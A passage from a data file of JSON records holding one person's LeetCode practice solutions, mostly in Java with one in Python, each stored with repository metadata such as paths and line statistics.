"eb59b7218c79ecb2e1a4c92705662d780cd7b330", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 927, "license_type": "no_license", "max_line_length": 69, "num_lines": 29, "path": "/Binary_Tree_Level_Order_Traversal.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "/**\n * Definition for a binary tree node.\n * public class TreeNode {\n * int val;\n * TreeNode left;\n * TreeNode right;\n * TreeNode(int x) { val = x; }\n * }\n */\nclass Solution {\n public List<List<Integer>> levelOrder(TreeNode root) {\n List<List<Integer>> results = new ArrayList<List<Integer>>();\n Queue<TreeNode> queue = new LinkedList<TreeNode>();\n if(root == null){return results;}\n queue.offer(root);\n while(!queue.isEmpty()){\n int qsize = queue.size();\n List<Integer> result = new ArrayList<Integer>();\n for(int i = 0; i < qsize; i ++){\n TreeNode temp = queue.poll();\n if(temp.left != null){queue.offer(temp.left);}\n if(temp.right != null){queue.offer(temp.right);}\n result.add(temp.val);\n }\n results.add(result);\n }\n return results;\n }\n}" }, { "alpha_fraction": 0.3309859037399292, "alphanum_fraction": 0.34859153628349304, "avg_line_length": 24.266666412353516, "blob_id": "15e0a6c19cc0f44964c3fd3356e2b5f0ae8d3acf", "content_id": 
"4686134c4c5225c30818562d97a54e5bb303a812", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1136, "license_type": "no_license", "max_line_length": 51, "num_lines": 45, "path": "/Product_of_Array_Except_Self.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "public int[] productExceptSelf(int[] nums) {\n int total = 1;\n int count = 0;\n for(int num : nums){\n if(num != 0){total = total * num;}\n else{\n count ++;\n if(count == 2){break;}\n }\n }\n if(count == 0){\n for(int i = 0 ; i < nums.length; i ++){\n nums[i] = total / nums[i];\n }\n }else if(count == 1){\n for(int i = 0 ; i < nums.length; i ++){\n if(nums[i] != 0){\n nums[i] = 0;\n }else{\n nums[i] = total;\n }\n }\n }else{\n for(int i = 0 ; i < nums.length; i ++){\n nums[i] = 0;\n }\n }\n return nums;\n }\n\n//Nubility\npublic int[] productExceptSelf(int[] nums) {\n int n = nums.length;\n int[] res = new int[n];\n res[0] = 1;\n for (int i = 1; i < n; i++) {\n res[i] = res[i - 1] * nums[i - 1];\n }\n int right = 1;\n for (int i = n - 1; i >= 0; i--) {\n res[i] *= right;\n right *= nums[i];\n }\n return res;\n}" }, { "alpha_fraction": 0.5649913549423218, "alphanum_fraction": 0.5649913549423218, "avg_line_length": 23.08333396911621, "blob_id": "69e017756b0537ccf47c66cbdeaef166cda8559c", "content_id": "6ba0da94b0675cf7d6714c160602fb525a032f0e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 577, "license_type": "no_license", "max_line_length": 58, "num_lines": 24, "path": "/Flatten_Binary_Tree_to_Linked_List.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "/**\n * Definition for a binary tree node.\n * public class TreeNode {\n * int val;\n * TreeNode left;\n * TreeNode right;\n * TreeNode(int x) { val = x; }\n * }\n */\nclass Solution {\n public void flatten(TreeNode root) {\n dfs(root, null);\n }\n \n public TreeNode dfs(TreeNode root, TreeNode previous){\n if(root == null){return previous;}\n previous = dfs(root.right, previous);\n previous = dfs(root.left, previous);\n root.right = previous;;\n root.left = null;\n previous = root;\n return previous;\n }\n}" }, { "alpha_fraction": 0.37152209877967834, "alphanum_fraction": 0.3764320909976959, "avg_line_length": 25.60869598388672, "blob_id": "f9a8f347abdf4d46328b6803a3cecadb9bd3ca6d", "content_id": "f4bfaddb9dcbcd33f1c1b284bbfbe7c06f725a57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 611, "license_type": "no_license", "max_line_length": 55, "num_lines": 23, "path": "/Is_Subsequence.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public boolean isSubsequence(String s, String t) {\n char[] sub = s.toCharArray();\n char[] title = t.toCharArray();\n int index = 0;\n boolean flag = false;\n \n for(int i = 0;i < sub.length; i ++){\n flag = false;\n for(int j = index; j < title.length; j ++){\n if(title[j] == sub[i]){\n flag = true;\n index = j + 1;\n break;\n }\n }\n if(!flag){\n return false;\n }\n }\n return true;\n }\n}" }, { "alpha_fraction": 0.46341463923454285, "alphanum_fraction": 0.47256097197532654, "avg_line_length": 26.41666603088379, "blob_id": "6b4541a79c651bd45a1d060160ff03b2bb245424", "content_id": "d74a7ef0d9a8cc50d5bf8534db481114ebffd79f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 328, "license_type": "no_license", "max_line_length": 49, 
"num_lines": 12, "path": "/Maximum_Subarray.py", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution(object):\n def maxSubArray(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n sum_i = nums[0]\n result = nums[0]\n for i in range(1,len(nums)):\n sum_i = max(nums[i], sum_i + nums[i])\n result = max(result, sum_i)\n return result" }, { "alpha_fraction": 0.29490020871162415, "alphanum_fraction": 0.35254988074302673, "avg_line_length": 25.58823585510254, "blob_id": "19fcc7664b9eef6fe52951ba55778e9337f100db", "content_id": "2bb8745f75dfd93ccf0f6270dab7d7b27b318e1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 451, "license_type": "no_license", "max_line_length": 63, "num_lines": 17, "path": "/Merge_Sorted_Array.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public void merge(int[] nums1, int m, int[] nums2, int n) {\n int l1 = m - 1;\n int l2 = n - 1;\n int len = m + n - 1;\n while(l1 >= 0 && l2 >= 0){\n if(nums2[l2] > nums1[l1]){\n nums1[len --] = nums2[l2 --];\n }else{\n nums1[len --] = nums1[l1 --];\n }\n }\n while(l2 >= 0){\n nums1[len --] = nums2[l2 --];\n } \n }\n}" }, { "alpha_fraction": 0.5867158770561218, "alphanum_fraction": 0.5904058814048767, "avg_line_length": 17.133333206176758, "blob_id": "cc7b66a527feabf19d9e57e72828f900c6783ba5", "content_id": "7422aaa4557c823471bfd90f2b3570b4ad0e6296", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 271, "license_type": "no_license", "max_line_length": 44, "num_lines": 15, "path": "/Convert_BST_to_Greater_Tree.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n int plus = 0;\n\tpublic TreeNode convertBST(TreeNode root) {\n dfs(root);\n return root;\n }\n\t\n\tpublic void dfs(TreeNode node) {\n\t\tif(node == null) {return;}\n\t\tdfs(node.right);\n\t\tnode.val += plus;\n\t\tplus = node.val;\n\t\tdfs(node.left);\n\t}\n}" }, { "alpha_fraction": 0.5087209343910217, "alphanum_fraction": 0.5101743936538696, "avg_line_length": 31.809524536132812, "blob_id": "11115064a6263bcd4ca24c14d832a20198ec8d31", "content_id": "e1b857dae12a8999e43bd19ce6577cafa7b34f30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 688, "license_type": "no_license", "max_line_length": 70, "num_lines": 21, "path": "/Word_Pattern.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public boolean wordPattern(String pattern, String str) {\n String[] strs = str.split(\" \");\n if(strs.length != pattern.length()){return false;}\n Map<Character, String> map = new HashMap<Character, String>();\n Set<String> set = new HashSet<String>();\n for(int i = 0; i < pattern.length(); i ++) {\n \tchar key = pattern.charAt(i);\n \tif(map.containsKey(key)) {\n \t\tif(!map.get(key).equals(strs[i])) {\n \t\t\treturn false;\n \t\t}\n \t} else {\n \t\tif(set.contains(strs[i])) {return false;}\n \t\tmap.put(key, strs[i]);\n \t\tset.add(strs[i]);\n \t}\n }\n return true;\n }\n}" }, { "alpha_fraction": 0.35528597235679626, "alphanum_fraction": 0.37088388204574585, "avg_line_length": 27.875, "blob_id": "8be88d04e6ab2e7503de853a725cb7841faeef53", "content_id": "dbd5e2fa1cbed4737dd76d530c14432171222614", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1154, "license_type": "no_license", "max_line_length": 
71, "num_lines": 40, "path": "/Find_K_Closest_Elements.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public List<Integer> findClosestElements(int[] arr, int k, int x) {\n List<Integer> list = new LinkedList<Integer>();\n int left = 0;\n int right = 0;\n int i = 0;\n if(arr.length == 1){\n list.add(arr[0]);\n return list;\n }\n for(i = 0; i < arr.length; i++){\n if(x <= arr[i]){\n left = i - 1;\n right = i;\n break;\n }\n }\n if(i == arr.length){\n left = i - 2;\n right = i - 1;\n }else if(i == 0){\n left = i;\n right = i + 1;\n }\n for(i = 0; i < arr.length; i++){\n if(Math.abs(arr[left] - x) <= Math.abs(arr[right] - x)){\n list.add(arr[left]);\n if(left - 1 >= 0){left --;}\n else{left = arr.length - 1;}\n }else{\n list.add(arr[right]);\n if(right + 1 <= arr.length - 1){right ++;}\n else{right = 0;}\n }\n if(list.size() == k){break;}\n }\n Collections.sort(list);\n return list;\n }\n}" }, { "alpha_fraction": 0.4047619104385376, "alphanum_fraction": 0.41228070855140686, "avg_line_length": 27.535715103149414, "blob_id": "9ae65e12633e9215d8bd055e140b8c85b7c6cee4", "content_id": "0911636595594a12d2452a19ac66ad98d1a41bfa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 798, "license_type": "no_license", "max_line_length": 80, "num_lines": 28, "path": "/Jump_Game.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public boolean canJump(int[] nums) { \n if(nums.length == 1){return true;}\n if(nums[0] == 0){return false;} \n for(int i = 0; i < nums.length;){ \n if(i + nums[i] >= nums.length - 1){return true;}\n int next = findMax(nums, i, i + nums[i]);\n if(nums[next] == 0){\n return false;\n } \n i = next; \n }\n return true;\n }\n \n public int findMax(int[] nums, int start, int end){\n int pos = end;\n int max = nums[end];\n for(int z = end; z > start; z --){ //right to left, as far as possible\n if(z + nums[z] > max + pos){\n max = nums[z];\n pos = z;\n }\n }\n return pos;\n }\n \n}" }, { "alpha_fraction": 0.4961240291595459, "alphanum_fraction": 0.5085271596908569, "avg_line_length": 34.88888931274414, "blob_id": "ff4ebd03a66f36c0d27417f808e3ce1b640635ff", "content_id": "7afb839392dc2b58d85cadc06ac70db658bcced4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 645, "license_type": "no_license", "max_line_length": 89, "num_lines": 18, "path": "/Maximum_Product_Subarray.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public int maxProduct(int[] nums) {\n if(nums == null || nums.length == 0) {return 0;}\n int max = nums[0];\n int preMax = nums[0];\n int preMin = nums[0];\n int currentMax = nums[0];\n int currentMin = nums[0];\n for(int i = 1; i < nums.length; i ++) {\n currentMax = Math.max(nums[i], Math.max(nums[i] * preMax, nums[i] * preMin));\n currentMin = Math.min(nums[i], Math.min(nums[i] * preMax, nums[i] * preMin));\n max = Math.max(max, currentMax);\n preMax = currentMax;\n preMin = currentMin;\n }\n return max;\n }\n}" }, { "alpha_fraction": 0.5359001159667969, "alphanum_fraction": 0.5359001159667969, "avg_line_length": 29.0625, "blob_id": "86f21a090a556fa0cdb5d939a563b2e6899ad5e0", "content_id": "7de590358237623e99099c332437badf80f11689", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 961, "license_type": "no_license", "max_line_length": 79, "num_lines": 32, "path": 
"/Validate_Binary_Search_Tree.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public boolean isValidBST(TreeNode root) {\n if(root == null) {return true;}\n if(root.left != null) {\n \tTreeNode temp = root.left;\n \twhile(temp != null) {\n \t\tif(temp.val >= root.val) {return false;}\n \t\ttemp = temp.right;\n \t}\n }\n if(root.right != null) {\n \tTreeNode temp = root.right;\n \twhile(temp != null) {\n \t\tif(temp.val <= root.val) {return false;}\n \t\ttemp = temp.left;\n \t}\n }\n return isValidBST(root.left) && isValidBST(root.right);\n }\n}\n\nclass Solution {\n public boolean isValidBST(TreeNode root) {\n return dfs(root, Long.MIN_VALUE, Long.MAX_VALUE);\n }\n \n public boolean dfs(TreeNode root, long min, long max) {\n if(root == null) {return true;}\n if(root.val <= min || root.val >= max) {return false;}\n return dfs(root.left, min, root.val) && dfs(root.right, root.val, max);\n }\n}" }, { "alpha_fraction": 0.46298032999038696, "alphanum_fraction": 0.47797563672065735, "avg_line_length": 27.105262756347656, "blob_id": "f218b8fe1232147f094467a0f8208a86b6041122", "content_id": "00ace3f53e2c1226071cf14970a084588a196bfa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1067, "license_type": "no_license", "max_line_length": 93, "num_lines": 38, "path": "/Decode_String.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public String decodeString(String s) {\n if(s == null || s.length() == 0) {return s;}\n Stack<String> stack = new Stack<String>();\n int num = 0;\n char[] chars = s.toCharArray();\n for(char c : chars) {\n \tif(c >= '0' && c <= '9') {\n \t\tnum *= 10;\n \t\tnum += (c - '0');\n \t} else if(c == '[') {\n \t\tstack.push(String.valueOf(num));\n \t\tnum = 0;\n \t} else if(c == ']') {\n \t\tprocess(stack);\n \t} else {\n \t\tstack.push(String.valueOf(c));\n \t}\n }\n if(stack.size() > 1) {process(stack);}\n return stack.pop();\n }\n\t\n\tpublic void process(Stack<String> stack) {\n\t\tStringBuilder s = new StringBuilder();\n\t\twhile(!stack.isEmpty() && (stack.peek().charAt(0) < '0' || stack.peek().charAt(0) > '9')) {\n\t\t\ts.insert(0, stack.pop());\n\t\t}\n\t\tif(!stack.isEmpty()) {\n\t\t\tString str = s.toString();\n\t\t\tint times = Integer.parseInt(stack.pop());\n\t\t\tfor(int i = 0; i < times - 1; i ++) {\n\t\t\t\ts.append(str);\n\t\t\t}\n\t\t}\n\t\tstack.push(s.toString());\n\t}\n}" }, { "alpha_fraction": 0.5279642343521118, "alphanum_fraction": 0.536912739276886, "avg_line_length": 16.920000076293945, "blob_id": "4c983238c542ed739ce1d76aae06d8028b366629", "content_id": "301491ab8086b5a01d1a28cc8177a76b3eacd933", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 447, "license_type": "no_license", "max_line_length": 64, "num_lines": 25, "path": "/Target_Sum.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n int sum = 0;\n\tpublic int findTargetSumWays(int[] nums, int S) {\n\t\tdfs(nums, 0, S, true);\n\t\tdfs(nums, 0, S, false);\n\t\treturn sum;\n }\n\t\n\tpublic void dfs(int[] nums, int index, int S, boolean symbol) {\n\t\tif(symbol) {\n\t\t\tS -= nums[index];\n\t\t} else {\n\t\t\tS += nums[index];\n\t\t}\n\t\tindex ++;\n\t\tif(index == nums.length) {\n\t\t\tif(S == 0) {\n\t\t\t\tsum ++;\n\t\t\t}\n\t\t\treturn;\n\t\t}\n\t\tdfs(nums, index, S, true);\n\t\tdfs(nums, index, S, false);\n\t}\n}" }, { "alpha_fraction": 0.4890895485877991, 
"alphanum_fraction": 0.4913468658924103, "avg_line_length": 32.25, "blob_id": "33dab51e23ce92998c07695627941b93000b9185", "content_id": "8ccaeef7551b97b31d73fe6965b15eea0c66f807", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1329, "license_type": "no_license", "max_line_length": 100, "num_lines": 40, "path": "/Byte_Dance_Five.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "import java.util.*;\n\npublic class Main{\n\n public static void main(String[] args) {\n Scanner scanner = new Scanner(System.in);\n int n = scanner.nextInt();\n int m = scanner.nextInt();\n int result = 0;\n Map<Integer, Set<Integer>> map = new HashMap<>();\n for(int i = 0; i < m; i ++) {\n int x = scanner.nextInt();\n int y = scanner.nextInt();\n Set<Integer> set = map.getOrDefault(y, new HashSet<>());\n set.add(x);\n map.put(y, set);\n }\n for(Map.Entry<Integer, Set<Integer>> entry : map.entrySet()) {\n Set<Integer> new_set = new HashSet<>();\n new_set.add(entry.getKey());\n dfs(entry.getValue(), new_set, map);\n map.put(entry.getKey(), new_set);\n }\n for(int i = 1; i <= n; i ++) {\n if(map.containsKey(i) && map.get(i).size() == n) { result ++; }\n }\n System.out.println(result);\n scanner.close();\n }\n\n public static void dfs(Set<Integer> set, Set<Integer> new_set, Map<Integer, Set<Integer>> map) {\n for(int num : set) {\n if(new_set.contains(num)) { continue; }\n new_set.add(num);\n if(map.containsKey(num)) {\n dfs(map.get(num), new_set, map);\n }\n }\n }\n}" }, { "alpha_fraction": 0.5677083134651184, "alphanum_fraction": 0.5729166865348816, "avg_line_length": 27.481481552124023, "blob_id": "2dde0742d9a4190633906f153db98754f48df385", "content_id": "d444b34f5398fb25f09d1346517713e8a44aa9c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 768, "license_type": "no_license", "max_line_length": 83, "num_lines": 27, "path": "/Palindrome_Partitioning.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "public List<List<String>> partition(String s) {\n List<List<String>> result = new ArrayList<List<String>>();\n List<String> list = new ArrayList<String>();\n dfs(s, 0, result, list);\n return result;\n }\n\t\n\tpublic void dfs(String s, int pos, List<List<String>> result, List<String> list) {\n\t\tif(pos == s.length()) {\n\t\t\tresult.add(new ArrayList<String>(list));\n\t\t} else {\n\t\t\tfor(int i = pos; i < s.length(); i ++) {\n\t\t\t\tif(isPalindrome(s, pos, i)) {\n\t\t\t\t\tlist.add(s.substring(pos, i + 1));\n\t\t\t\t\tdfs(s, i + 1, result, list);\n\t\t\t\t\tlist.remove(list.size() - 1);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\t\n\tpublic boolean isPalindrome(String s, int low, int high) {\n\t\twhile(low < high) {\n\t\t\tif(s.charAt(low ++) != s.charAt(high --)) {return false;}\n\t\t}\n\t\treturn true;\n\t}" }, { "alpha_fraction": 0.5021528601646423, "alphanum_fraction": 0.5048438906669617, "avg_line_length": 31.61403465270996, "blob_id": "aec6c9cc6198092477ca22084e7bbfb19176dd3e", "content_id": "8856af32031ca186f0978548139d35c94b2fe0db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1858, "license_type": "no_license", "max_line_length": 105, "num_lines": 57, "path": "/LCA.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public TreeNode lowestCommonAncestor(TreeNode root, TreeNode p, TreeNode q) {\n if (root == null) {\n return null;\n } \n \n if (root == p || 
root == q) {\n return root;\n }\n \n TreeNode left = lowestCommonAncestor(root.left, p, q);\n TreeNode right = lowestCommonAncestor(root.right, p, q);\n \n if (left == null) {\n return right;\n } else if (right == null) {\n return left;\n } else {\n return root;\n }\n }\n}\n\nclass Solution {\n boolean pflag = false;\n boolean qflag = false;\n public TreeNode lowestCommonAncestor(TreeNode root, TreeNode p, TreeNode q) {\n List<TreeNode> plist = new ArrayList<TreeNode>();\n List<TreeNode> qlist = new ArrayList<TreeNode>();\n dfs(root, plist, qlist, p.val, q.val, 0);\n int compare = Math.min(plist.size(), qlist.size()) - 1;\n for(int i = compare; i >= 0; i --) {\n if(plist.get(i).val == qlist.get(i).val) {\n return plist.get(i);\n }\n }\n return root;\n }\n \n public void dfs(TreeNode root, List<TreeNode> plist, List<TreeNode> qlist, int p, int q, int level) {\n if(root == null || (qflag && pflag)) {return;}\n if(!pflag) {\n if(plist.size() <= level) {plist.add(root);}\n else {plist.set(level, root);}\n }\n if(!qflag) {\n if(qlist.size() <= level) {qlist.add(root);}\n else {qlist.set(level, root);}\n }\n if(root.val == p) {pflag = true;} \n else if(root.val == q) {qflag = true;}\n dfs(root.left, plist, qlist, p, q, level + 1);\n dfs(root.right, plist, qlist, p, q, level + 1);\n if(!pflag) {plist.remove(root);}\n if(!qflag) {qlist.remove(root);}\n }\n}" }, { "alpha_fraction": 0.621107280254364, "alphanum_fraction": 0.6314879059791565, "avg_line_length": 26.571428298950195, "blob_id": "55c484ad7ed0acfee05689fc41575697f0acd2b7", "content_id": "3c5565cf45fac823d678707445ec63e3cfb495a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 578, "license_type": "no_license", "max_line_length": 72, "num_lines": 21, "path": "/Zigzag_Level_Order_Traversal_2.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "public List<List<Integer>> LevelOrder(TreeNode root) {\n\t\tList<List<Integer>> result = new ArrayList<List<Integer>>();\n\t\tDFS(root, result, 0);\n\t\treturn result;\n\t}\n\t\n\tpublic void DFS(TreeNode curr, List<List<Integer>> result, int level) {\n\t\tif(curr == null) {return;}\n\t\tif(result.size() <= level) {\n\t\t\tList<Integer> temp = new ArrayList<Integer>();\n\t\t\tresult.add(temp);\n\t\t}\n\t\tList<Integer> temp = result.get(level);\n\t\tif(level % 2 == 0) {\n\t\t\ttemp.add(curr.val);\n\t\t} else {\n\t\t\ttemp.add(0, curr.val);\n\t\t}\n\t\tDFS(curr.left, result, level + 1);\n\t\tDFS(curr.right, result, level + 1);\n\t}" }, { "alpha_fraction": 0.6226053833961487, "alphanum_fraction": 0.6245210766792297, "avg_line_length": 31.6875, "blob_id": "a6c9e2ff523c78436c3faa35f217b69d4fd5d535", "content_id": "87dafbbffebdd4efc41da3c46f5fa23159547795", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 522, "license_type": "no_license", "max_line_length": 84, "num_lines": 16, "path": "/Group_Anagrams.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public List<List<String>> groupAnagrams(String[] strs) {\n if(strs == null || strs.length == 0) {return new ArrayList<List<String>>();}\n\t\tMap<String, List<String>> map = new HashMap<String, List<String>>();\n\t\tfor(String str : strs) {\n\t\t\tchar[] alp = str.toCharArray();\n\t\t\tArrays.sort(alp);\n\t\t\tString key = String.valueOf(alp);\n\t\t\tif(!map.containsKey(key)) {\n\t\t\t\tmap.put(key, new ArrayList<String>());\n\t\t\t}\n\t\t\tmap.get(key).add(str);\n\t\t}\n\t\treturn 
new ArrayList<List<String>>(map.values());\n    }\n}" }, { "alpha_fraction": 0.44626864790916443, "alphanum_fraction": 0.4470149278640747, "avg_line_length": 28.15217399597168, "blob_id": "0f80cacff8a1aa1071bb57a9c2c990ae83c851ab", "content_id": "5af7773c0969e19ff5e51a24c0bd3573b2b80874", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1340, "license_type": "no_license", "max_line_length": 65, "num_lines": 46, "path": "/Find_Largest_Value_in_Each_Tree_Row.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "/**\n * Definition for a binary tree node.\n * public class TreeNode {\n *     int val;\n *     TreeNode left;\n *     TreeNode right;\n *     TreeNode(int x) { val = x; }\n * }\n */\nclass Solution {\n    public List<Integer> largestValues(TreeNode root) {\n        List<Integer> result = new ArrayList<Integer>();\n        Queue<TreeNode> lists = new LinkedList<TreeNode>();\n        if(root == null){\n            return result;\n        }\n        result.add(root.val);\n        lists.offer(root);\n        \n        while(lists.peek() != null){\n            List<TreeNode> temp_list = new ArrayList<TreeNode>();\n            int max = Integer.MIN_VALUE;\n            while(lists.peek() != null){\n                TreeNode temp = lists.poll();\n                TreeNode left = temp.left;\n                TreeNode right = temp.right;\n                if(left != null){\n                    max = Math.max(max, left.val);\n                    temp_list.add(left);\n                }\n                if(right != null){\n                    max = Math.max(max, right.val);\n                    temp_list.add(right);\n                }\n            }\n            if(temp_list.size() != 0){\n                result.add(max);\n            }\n            for(TreeNode i : temp_list){\n                lists.offer(i);\n            }\n        }\n        \n        return result;\n    }\n}" }, { "alpha_fraction": 0.4899497628211975, "alphanum_fraction": 0.5025125741958618, "avg_line_length": 29.69230842590332, "blob_id": "270ad8cec228722965107f735fc6c3d8c99612cb", "content_id": "bc9a461461e7c815a6024b77ca114e8c5846905e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 398, "license_type": "no_license", "max_line_length": 61, "num_lines": 13, "path": "/Find_All_Numbers_Disappeared_in_an_Array.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n    public List<Integer> findDisappearedNumbers(int[] nums) {\n        List<Integer> results = new ArrayList<Integer>();\n        int[] counts = new int[nums.length];\n        for(int num : nums) {\n            counts[num - 1] += 1;\n        }\n        for(int i = 0; i < nums.length; i ++) {\n            if(counts[i] == 0) {results.add(i + 1);}\n        }\n        return results;\n    }\n}" }, { "alpha_fraction": 0.38100820779800415, "alphanum_fraction": 0.39273154735565186, "avg_line_length": 30.629629135131836, "blob_id": "50156577ca4f91d34a36d3e1b29f7d46102c4f4d", "content_id": "f21b286f73f97fbde5940899f1028a02bd5493e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 861, "license_type": "no_license", "max_line_length": 60, "num_lines": 27, "path": "/Set_Matrix_Zeroes.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n    public void setZeroes(int[][] matrix) {\n        int m = matrix.length;\n        int n = matrix[0].length;\n        List<String> zeros = new ArrayList<String>();\n        for(int i = 0; i < m; i ++){\n            for(int j = 0; j < n; j ++){\n                if(matrix[i][j] == 0){\n                    zeros.add(i + \"-\" + j);\n                }\n            }\n        }\n        // Use an Iterator to traverse the recorded zero positions \n        Iterator it = zeros.iterator(); \n        while(it.hasNext()) { \n            String[] zero = it.next().toString().split(\"-\");\n            int key = Integer.parseInt(zero[0]);\n            int value = Integer.parseInt(zero[1]);\n            for(int i = 0; i < m; i ++){\n                matrix[i][value] = 0;\n            }\n            for(int i = 0; i < n; i 
++){\n matrix[key][i] = 0;\n }\n } \n }\n}" }, { "alpha_fraction": 0.5029940009117126, "alphanum_fraction": 0.5119760632514954, "avg_line_length": 24.69230842590332, "blob_id": "62b122bb3c6adbe7c477835f86e446336bb673e5", "content_id": "106c7b8da632f2ef8a06a0742cc1458baf7aff07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 668, "license_type": "no_license", "max_line_length": 67, "num_lines": 26, "path": "/findKMax.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "\tpublic static void findKmax(int[] nums, int low, int high, int k) {\n\t\tif(low > high) {return;}\n\t\tint i = low;\n\t\tint j = high;\n\t\tint index = nums[i];\n\t\twhile(i < j) {\n\t\t\twhile(i < j && nums[j] >= index) {j --;}\n\t\t\tif(i < j) {nums[i ++] = nums[j];}\n\t\t\twhile(i < j && nums[i] < index) {i ++;}\n\t\t\tif(i < j) {nums[j --] = nums[i];}\n\t\t}\n\t\tnums[i] = index;\n\t\tif(i == k) {\n\t\t\treturn;\n\t\t} else if(i < k) {\n\t\t\tfindKmax(nums, i + 1, high, k);\n\t\t} else {\n\t\t\tfindKmax(nums, low, i - 1, k);\n\t\t}\n\t}\n\t\n\tpublic static int findK(int[] nums, int k) {\n\t\tif(nums == null || k > nums.length) {return Integer.MIN_VALUE;}\n\t\tfindKmax(nums, 0, nums.length - 1, k - 1);\n\t\treturn nums[k - 1];\n\t}" }, { "alpha_fraction": 0.481389582157135, "alphanum_fraction": 0.4900744557380676, "avg_line_length": 35.681819915771484, "blob_id": "aa27c3ecd1adff86d0a0a583d5d1ea6028c867e5", "content_id": "7e6bc79e61a80df9e02a29ac17ea28a9c0791182", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 806, "license_type": "no_license", "max_line_length": 77, "num_lines": 22, "path": "/Permutations.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public List<List<Integer>> permute(int[] nums) {\n List<List<Integer>> result = new ArrayList<List<Integer>>();\n int length = nums.length;\n if(length == 0){return result;}\n List<Integer> num0 = new ArrayList<Integer>();\n num0.add(nums[0]);\n result.add(num0);\n for(int i = 1; i < length; i ++){\n List<List<Integer>> result_temp = new ArrayList<List<Integer>>();\n for(List<Integer> temp : result){\n for(int j = 0; j <= i; j ++){\n List<Integer> temp_arr = new ArrayList<Integer>(temp);\n temp_arr.add(j,nums[i]);\n result_temp.add(temp_arr);\n }\n }\n result = result_temp;\n }\n return result;\n }\n}" }, { "alpha_fraction": 0.32594937086105347, "alphanum_fraction": 0.34493669867515564, "avg_line_length": 25.375, "blob_id": "418ae506aa32d2ecbd70fe7083d9c44c808abd28", "content_id": "e8c82898f537bb8d679a381e37119fa5d9443834", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 632, "license_type": "no_license", "max_line_length": 55, "num_lines": 24, "path": "/Move_Zeroes.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public void moveZeroes(int[] nums) {\n int count = 0;\n int pos = 0;\n int start = nums.length - 1;\n for(int i = 0; i < nums.length; i ++) {\n if(nums[i] == 0) {\n if(count == 0) {start = i;}\n count ++;\n }\n }\n pos = start;\n for(int i = start + 1; i < nums.length; i ++) {\n if(nums[i] != 0) {\n nums[pos] = nums[i];\n pos = pos + 1;\n }\n }\n for(int i = nums.length - 1; count > 0; i --) {\n nums[i] = 0;\n count --;\n }\n }\n}" }, { "alpha_fraction": 0.520844042301178, "alphanum_fraction": 0.5352547764778137, "avg_line_length": 35.67924499511719, 